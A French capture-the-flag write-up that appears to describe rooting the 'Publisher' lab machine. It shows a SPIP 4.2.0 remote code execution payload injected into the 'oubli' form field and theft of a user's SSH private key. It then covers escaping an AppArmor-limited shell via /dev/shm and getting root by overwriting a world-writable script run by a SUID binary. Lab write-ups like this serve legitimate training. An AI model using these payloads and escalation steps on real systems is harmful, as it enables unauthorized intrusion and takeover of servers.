Publisher v2.1

SPIP shell limité

• Nom machine : Publisher v2.1

• Difficulté : Facile

• OS : Linux

Enumération

NMAP

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMc4hLykriw3nBOsKHJK1Y6eauB8OllfLLlztbB4tu4c9cO8qyOXSfZaCcb92uq/Y3u02PPHWq2yXOLPler1AFGVhuSfIpokEnT2jgQzKL63uJMZtoFzL3RW8DAzunrHhi/nQqo8sw7wDCiIN9s4PDrAXmP6YXQ5ekK30om9kd5jHG6xJ+/gIThU4ODr/pHAqr28bSpuHQdgphSjmeShDMg8wu8Kk/B0bL2oEvVxaNNWYWc1qHzdgjV5HPtq6z3MEsLYzSiwxcjDJ+EnL564tJqej6R69mjII1uHStkrmewzpiYTBRdgi9A3Yb+x8NxervECFhUR2MoR1zD+0UJbRA2v1LQaGg9oYnYXNq3Lc5c4aXz638wAUtLtw2SwTvPxDrlCmDVtUhQFDhyFOu9bSmPY0oGH5To8niazWcTsCZlx2tpQLhF/gS3jP/fVw+H6Eyz/yge3RYeyTv3ehV6vXHAGuQLvkqhT6QS21PLzvM7bCqmo1YIqHfT2DLi7jZxdk=
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL/iO8JI5DrcvPDFlmqtX/lzemir7W+WegC7hpoYpkPES6q+0/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=
|   256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Publisher's Pulse: SPIP Insights & Tips
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nous allons énumérer le port 80

HTTP (80)

Nous tombons sur une page web, nous comprennons rapidement que ce site utilise SPIP.

──(kali㉿kali)-[~]
└─$ feroxbuster -u http://10.10.172.230
{...}
301      GET        9l       28w      320c http://10.10.172.230/spip/config => http://10.10.172.230/spip/config/
301      GET        9l       28w      319c http://10.10.172.230/spip/local => http://10.10.172.230/spip/local/
{...}

En allant sur la page on récupère deux bases de données, nous allons les récupérer.

Nous trouvons ceci dans spip.sqlite. Un nom d'user possiblement et le hash d'un mot de passe. Nous avons tenté de le cracker mais sans succès.

En suivant spip/local, nous trouvons aussi un fichier intéressant : config.txt.

Celui-ci indique le numéro de version : 4.2.0

Nous allons chercher un exploit.

SPIP v4.2.0 - Remote Code Execution (Unauthenticated)Exploit Database

Accès initial

La lecture de l'exploit nous permet de trouver le chemin : http://10.10.172.230/spip/spip.php?page=spip_pass&lang=fr

Celui-ci nous mène à la page "mot de passe oublié" d'une page de login. Le formulaire est vulnérable. Nous allons l'attaquer manuelle à l'aide de Burp Suite.

Le payload a envoyé au paramètre oubli est le suivant : s:22:"<?php+system('id');+?>

s:22 signifie la longueur de la chaîne de caractère.

Nous avons énumérer la machine, en modifiant toujours notre payload selon sa taille. Nous retrouvons l'utilisateur think, et par chance, celui-ci à une clef id_rsa stocké dans .ssh.

Nous la copions sur notre machine, changeons ses permissions puis nous connectons en ssh.

┌──(kali㉿kali)-[~/thm]
└─$ chmod 600 id_rsa
                                                                  
┌──(kali㉿kali)-[~/thm]
└─$ ssh think@10.10.172.230 -i id_rsa
think@publisher:~$ whoami
think

Elévation des privilèges

Nous avons shell limité, dans un premier temps nous allons devoir nous en echapper.

think@publisher:~$ cat /etc/passwd | grep think
think:x:1000:1000:,,,:/home/think:/usr/sbin/ash

think@publisher:~$ env
SHELL=/usr/sbin/ash
{...}
OLDPWD=/etc/apparmor.d
_=/usr/bin/env

think@publisher:/etc/apparmor.d$ cat usr.sbin.ash
#include <tunables/global>

/usr/sbin/ash flags=(complain) {
  #include <abstractions/base>
  #include <abstractions/bash>
  #include <abstractions/consoles>
  #include <abstractions/nameservice>
  #include <abstractions/user-tmp>

  # Remove specific file path rules
  # Deny access to certain directories
  deny /opt/ r,
  deny /opt/** w,
  deny /tmp/** w,
  deny /dev/shm w,
  deny /var/tmp w,
  deny /home/** w,
  /usr/bin/** mrix,
  /usr/sbin/** mrix,

  # Simplified rule for accessing /home directory
  owner /home/** rix,
}

Nous avons la liste des répertoires bloqués. Un point import : /dev/shm/** ne l'est pas.

Nous en profiter pour copier bash.

think@publisher:/dev/shm$ cp /bin/bash pwn
think@publisher:/dev/shm$ ./pwn -p
think@publisher:/dev/shm$ ls -l /opt
total 12
drwx--x--x 4 root root 4096 Nov 14  2023 containerd
-rw-r--r-- 1 root root  861 Dec  7  2023 dockerfile
-rwxrwxrwx 1 root root 1715 Jan 10  2024 run_container.sh

Nous avons enfin un shell normal.

think@publisher:/dev/shm$ find / -perm -u=s 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/sbin/run_container
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount

run_container est intéressant

think@publisher:/dev/shm$ /usr/sbin/run_container
List of Docker containers:
ID: b47a6e3d445a | Name: confident_agnesi | Status: Created
ID: 41c976e507f8 | Name: jovial_hertz | Status: Up 35 minutes

Enter the ID of the container or leave blank to create a new one: 1
/opt/run_container.sh: line 16: validate_container_id: command not found

OPTIONS:
1) Start Container    3) Restart Container  5) Quit
2) Stop Container     4) Create Container
Choose an action for a container: 5
Exiting...

Nous mène vers /opt/run_container.sh ... Que nous pouvons écrire !

think@publisher:/opt$ ls -l
total 12
drwx--x--x 4 root root 4096 Nov 14  2023 containerd
-rw-r--r-- 1 root root  861 Dec  7  2023 dockerfile
-rwxrwxrwx 1 root root 1715 Jan 10  2024 run_container.sh
think@publisher:/opt$ echo "chmod u+s /bin/bash" > run_container.sh
think@publisher:/opt$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18  2022 /bin/bash
think@publisher:/opt$ /bin/bash -p
bash-5.0# whoami
root

Nous sommes root !